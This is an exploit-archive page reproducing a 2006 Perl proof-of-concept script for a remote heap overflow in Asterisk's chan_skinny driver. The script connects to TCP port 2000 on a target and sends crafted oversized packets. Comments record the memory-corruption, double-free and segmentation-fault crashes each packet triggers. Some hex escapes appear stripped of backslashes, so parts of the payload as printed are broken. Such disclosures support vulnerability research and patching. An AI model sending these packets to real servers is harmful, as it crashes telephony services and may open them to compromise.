Asterisk <= 1.0.12 / 1.2.12.1 (chan_skinny) Remote Heap Overflow (PoC)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Asterisk <= 1.0.12 / 1.2.12.1 (chan_skinny) Remote Heap Overflow (PoC)
# Published : 2006-10-19
# Author : Noam Rathaus
# Previous Title : QK SMTP <= 3.01 (RCPT TO) Remote Denial of Service Exploit
# Next Title : Clam AntiVirus <= 0.88.4 CHM Chunk Name Length DoS PoC

#!/usr/bin/perl
# Beyond Security
# Copyright Noam Rathaus <noamr@beyondsecurity.com>

#
# The following proof of concept causes the chan_skippy to crash in different locations and due to
# memory corruption as well as double free calls, this is based on the finding of
# Security-Assessment.com, and proves that the vulnerability is indeed exploitable and there...
#

use IO::Socket;
use strict;

my $target = "127.0.0.1";

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => "2000");

unless ($remote) { die "cannot connect to skinny daemon on $target" }

my $packet = "A"x1000; #Causes *** glibc detected *** malloc(): memory corruption: 0x08175830 ***
my $packet = "x30xE0x00x00"."x00x00x00x00".("A"x1000); # *** glibc detected *** double free or corruption (!prev): 0x08184348 ***
my $packet = "xE5x03x00x00".("A"x996); # *** glibc detected *** double free or corruption (out): 0x08171740 ***
my $packet = "xF0xFFxFFxFF".("A"x996); # Program received signal SIGSEGV, Segmentation fault.
#[Switching to Thread -1494127696 (LWP 9909)]
#0xa76264cb in skinny_session (data=0x8183ee8) at chan_skinny.c:2896
#2896 memcpy(req, s->inbuf, letohl(*(int*)(s->inbuf))+8);

print $remote $packet;

# www.Syue.com [2006-10-19]